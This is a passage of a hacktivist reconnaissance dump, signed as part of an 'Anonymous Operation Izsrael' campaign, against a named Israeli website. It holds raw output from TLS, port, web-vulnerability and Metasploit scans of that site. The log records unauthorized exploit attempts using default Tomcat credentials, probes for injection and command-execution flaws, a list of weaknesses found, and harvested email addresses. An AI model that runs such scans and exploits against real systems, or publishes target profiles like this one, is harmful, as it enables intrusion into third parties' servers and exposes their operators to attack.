1856. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1857. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1858. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
1859. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
1860. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
1861. Accepted TLSv1.1 128 bits AES128-SHA
1862. Accepted TLSv1.1 256 bits AES256-SHA
1863. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
1864. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
1865. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
1866. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
1867. Accepted TLSv1.1 112 bits DES-CBC3-SHA
1868. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1869. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1870. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
1871. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
1872. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
1873. Accepted TLSv1.0 128 bits AES128-SHA
1874. Accepted TLSv1.0 256 bits AES256-SHA
1875. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
1876. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
1877. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
1878. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
1879. Accepted TLSv1.0 112 bits DES-CBC3-SHA
1880.  
1881. SSL Certificate:
1882. Signature Algorithm: sha1WithRSAEncryption
1883. RSA Key Strength: 2048
1884.  
1885. Subject: localhost
1886. Issuer: localhost
1887.  
1888. Not valid before: Mar 8 07:53:03 2016 GMT
1889. Not valid after: Jul 24 07:53:03 2043 GMT
1890.  
1891. #######################################################################################################################################
1892.  
1893. __ ______ _____
1894. \ \/ / ___|_ _|
1895. \ /\___ \ | |
1896. / \ ___) || |
1897. /_/\_|____/ |_|
1898.  
1899. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
1900. + -- --=[Target: cord-blood.co.il:8080
1901. + -- --=[Site not vulnerable to Cross-Site Tracing!
1902. + -- --=[Site not vulnerable to Host Header Injection!
1903. + -- --=[Site vulnerable to Cross-Frame Scripting!
1904. + -- --=[Site vulnerable to Clickjacking!
1905.  
1906. HTTP/1.1 400 Bad Request
1907. Date: Fri, 23 Mar 2018 04:37:51 GMT
1908. Server: Apache/6.6.6
1909. Content-Length: 347
1910. Connection: close
1911. Content-Type: text/html; charset=iso-8859-1
1912.  
1913. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1914. <html><head>
1915. <title>400 Bad Request</title>
1916. </head><body>
1917. <h1>Bad Request</h1>
1918. <p>Your browser sent a request that this server could not understand.<br />
1919. </p>
1920. <p>Additionally, a 400 Bad Request
1921. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1922. </body></html>
1923.  
1924. HTTP/1.1 400 Bad Request
1925. Date: Fri, 23 Mar 2018 04:38:00 GMT
1926. Server: Apache/6.6.6
1927. Content-Length: 347
1928. Connection: close
1929. Content-Type: text/html; charset=iso-8859-1
1930.  
1931. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1932. <html><head>
1933. <title>400 Bad Request</title>
1934. </head><body>
1935. <h1>Bad Request</h1>
1936. <p>Your browser sent a request that this server could not understand.<br />
1937. </p>
1938. <p>Additionally, a 400 Bad Request
1939. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1940. </body></html>
1941.  
1942.  
1943.  
1944. Version: 1.11.11-static
1945. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1946.  
1947. Connected to 80.179.142.111
1948.  
1949. Testing SSL server cord-blood.co.il on port 8080 using SNI name cord-blood.co.il
1950.  
1951. TLS Fallback SCSV:
1952. Server does not support TLS Fallback SCSV
1953.  
1954. TLS renegotiation:
1955. Session renegotiation not supported
1956.  
1957. TLS Compression:
1958. Compression disabled
1959.  
1960. Heartbleed:
1961. TLS 1.2 not vulnerable to heartbleed
1962. TLS 1.1 not vulnerable to heartbleed
1963. TLS 1.0 not vulnerable to heartbleed
1964.  
1965. Supported Server Cipher(s):
1966.  
1967. Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-23 00:38 EDT
1968. Nmap scan report for cord-blood.co.il (80.179.142.111)
1969. Host is up (0.13s latency).
1970. rDNS record for 80.179.142.111: yanir.spd.co.il
1971.  
1972. PORT STATE SERVICE VERSION
1973. 8080/tcp filtered http-proxy
1974. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1975. Device type: firewall|general purpose
1976. Running: Linux 2.4.X|2.6.X, ISS embedded
1977. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
1978. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
1979.  
1980. TRACEROUTE (using proto 1/icmp)
1981. HOP RTT ADDRESS
1982. 1 ... 30
1983.  
1984. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1985. Nmap done: 1 IP address (1 host up) scanned in 12.32 seconds
1986. #######################################################################################################################################
1987. RHOST => cord-blood.co.il
1988. [-] WAR file not found
1989. [*] Auxiliary module execution completed
1990. RHOSTS => cord-blood.co.il
1991. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
1992. RHOST => cord-blood.co.il
1993. RPORT => 8080
1994. [*] Scanned 1 of 1 hosts (100% complete)
1995. [*] Auxiliary module execution completed
1996. [*] Attempting to connect to 80.179.142.111:8080
1997. [+] No File(s) found
1998. [*] Scanned 1 of 1 hosts (100% complete)
1999. [*] Auxiliary module execution completed
2000. [*] http://80.179.142.111:8080/admin/j_security_check - Checking j_security_check...
2001. [*] http://80.179.142.111:8080/admin/j_security_check - Server returned: 404
2002. [-] http://80.179.142.111:8080/admin/j_security_check - Unable to enumerate users with this URI
2003. [*] Scanned 1 of 1 hosts (100% complete)
2004. [*] Auxiliary module execution completed
2005. [-] http://80.179.142.111:8080 - Authorization not requested
2006. [*] Scanned 1 of 1 hosts (100% complete)
2007. [*] Auxiliary module execution completed
2008. [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/6.6.6" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
2009. [*] Exploit completed, but no session was created.
2010. USERNAME => tomcat
2011. PASSWORD => tomcat
2012. [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/6.6.6" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
2013. [*] Exploit completed, but no session was created.
2014. #######################################################################################################################################
2015.  
2016. * --- JexBoss: Jboss verify and EXploitation Tool --- *
2017. | * And others Java Deserialization Vulnerabilities * |
2018. | |
2019. | @author: João Filho Matos Figueiredo |
2020. | @contact: joaomatosf@gmail.com |
2021. | |
2022. | @update: https://github.com/joaomatosf/jexboss |
2023. #______________________________________________________#
2024.  
2025. @version: 1.2.4
2026.  
2027. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
2028.  
2029.  
2030. ** Checking Host: http://cord-blood.co.il:8080 **
2031.  
2032. [*] Checking admin-console: [ OK ]
2033. [*] Checking Struts2: [ OK ]
2034. [*] Checking Servlet Deserialization: [ OK ]
2035. [*] Checking Application Deserialization: [ OK ]
2036. [*] Checking Jenkins: [ OK ]
2037. [*] Checking web-console: [ OK ]
2038. [*] Checking jmx-console: [ OK ]
2039. [*] Checking JMXInvokerServlet: [ OK ]
2040. #######################################################################################################################################
2041.  
2042. Scan date: 23-3-2018 0:17:50
2043. ======================================================================================================================================
2044. | [*] http://cord-blood.co.il/ redirected to http://abuse.spd.co.il/
2045. | [*] New target is: http://abuse.spd.co.il/
2046. ======================================================================================================================================
2047. | Domain: http://abuse.spd.co.il/
2048. | Server: Apache/6.6.6
2049. | IP: 192.116.109.20
2050. =======================================================================================================================================
2051. |
2052. | Directory check:
2053. | [+] CODE: 200 URL: http://abuse.spd.co.il/squirrelmail/
2054. ======================================================================================================================================
2055. |
2056. | File check:
2057. | [+] CODE: 200 URL: http://abuse.spd.co.il/error/HTTP_NOT_FOUND.html.var
2058. | [+] CODE: 200 URL: http://abuse.spd.co.il/index.php
2059. | [+] CODE: 200 URL: http://abuse.spd.co.il/squirrelmail/src/read_body.php
2060. =======================================================================================================================================
2061. |
2062. | Check robots.txt:
2063. |
2064. | Check sitemap.xml:
2065. =======================================================================================================================================
2066. |
2067. | Crawler Started:
2068. | Plugin name: E-mail Detection v.1.1 Loaded.
2069. | Plugin name: phpinfo() Disclosure v.1 Loaded.
2070. | Plugin name: External Host Detect v.1.2 Loaded.
2071. | Plugin name: FCKeditor upload test v.1 Loaded.
2072. | Plugin name: Upload Form Detect v.1.1 Loaded.
2073. | Plugin name: Code Disclosure v.1.1 Loaded.
2074. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
2075. | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
2076. | [+] Crawling finished, 7 URL's found!
2077. |
2078. | E-mails:
2079. | [+] E-mail Found: webmaster@abuse.spd.co.il
2080. | [+] E-mail Found: johndoe@mail.spd.co.il
2081. |
2082. | PHPinfo() Disclosure:
2083. |
2084. | External hosts:
2085. | [+] External Host Found: http://www.sPD.co.il
2086. |
2087. | FCKeditor File Upload:
2088. |
2089. | File Upload Forms:
2090. |
2091. | Source Code Disclosure:
2092. |
2093. | Timthumb:
2094. |
2095. | Web Backdoors:
2096. |
2097. | Ignored Files:
2098. ======================================================================================================================================
2099. | Dynamic tests:
2100. | Plugin name: Learning New Directories v.1.2 Loaded.
2101. | Plugin name: FCKedior tests v.1.1 Loaded.
2102. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
2103. | Plugin name: Find Backup Files v.1.2 Loaded.
2104. | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
2105. | Plugin name: Local File Include tests v.1.1 Loaded.
2106. | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
2107. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
2108. | Plugin name: Remote File Include tests v.1.2 Loaded.
2109. | Plugin name: SQL-injection tests v.1.2 Loaded.
2110. | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
2111. | Plugin name: Web Shell Finder v.1.3 Loaded.
2112. | [+] 0 New directories added
2113. |
2114. |
2115. | FCKeditor tests:
2116. |
2117. |
2118. | Timthumb < 1.33 vulnerability:
2119. |
2120. |
2121. | Backup Files:
2122. |
2123. |
2124. | Blind SQL Injection:
2125. |
2126. |
2127. | Local File Include:
2128. |
2129. |
2130. | PHP CGI Argument Injection:
2131. |
2132. |
2133. | Remote Command Execution:
2134. |
2135. |
2136. | Remote File Include:
2137. |
2138. |
2139. | SQL Injection:
2140. |
2141. |
2142. | Cross-Site Scripting (XSS):
2143. |
2144. |
2145. | Web Shell Finder:
2146. ======================================================================================================================================
2147. | Static tests:
2148. | Plugin name: Local File Include tests v.1.1 Loaded.
2149. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
2150. | Plugin name: Remote File Include tests v.1.1 Loaded.
2151. ######################################################################################################################################
2152. --------------------------------------------------------------------------------------------------------------------------------------
2153. + Target IP: 80.179.142.111
2154. + Target Hostname: cord-blood.co.il
2155. + Target Port: 80
2156. + Start Time: 2018-03-23 00:41:31 (GMT-4)
2157. --------------------------------------------------------------------------------------------------------------------------------------
2158. + Server: nginx
2159. + The anti-clickjacking X-Frame-Options header is not present.
2160. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
2161. + Uncommon header 'x-rocket-nginx-bypass' found, with contents: No
2162. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
2163. + Root page / redirects to: http://abuse.spd.co.il
2164. + No CGI Directories found (use '-C all' to force check all possible dirs)
2165. + Retrieved x-powered-by header: PHP/5.6.30
2166. + Uncommon header 'link' found, with contents: <http://a-d-marhiv.co.il/wp-json/>; rel="https://api.w.org/"
2167. + Server leaks inodes via ETags, header found with file /sitemap.xml, fields: 0x4b37c181 0x1295
2168. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
2169. + Uncommon header 'x-ob_mode' found, with contents: 1
2170. + Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
2171. + Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
2172. + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized host
2173. #######################################################################################################################################
2174. Anonymous Operation Izsrael USA JTSEC full recon 2018 #7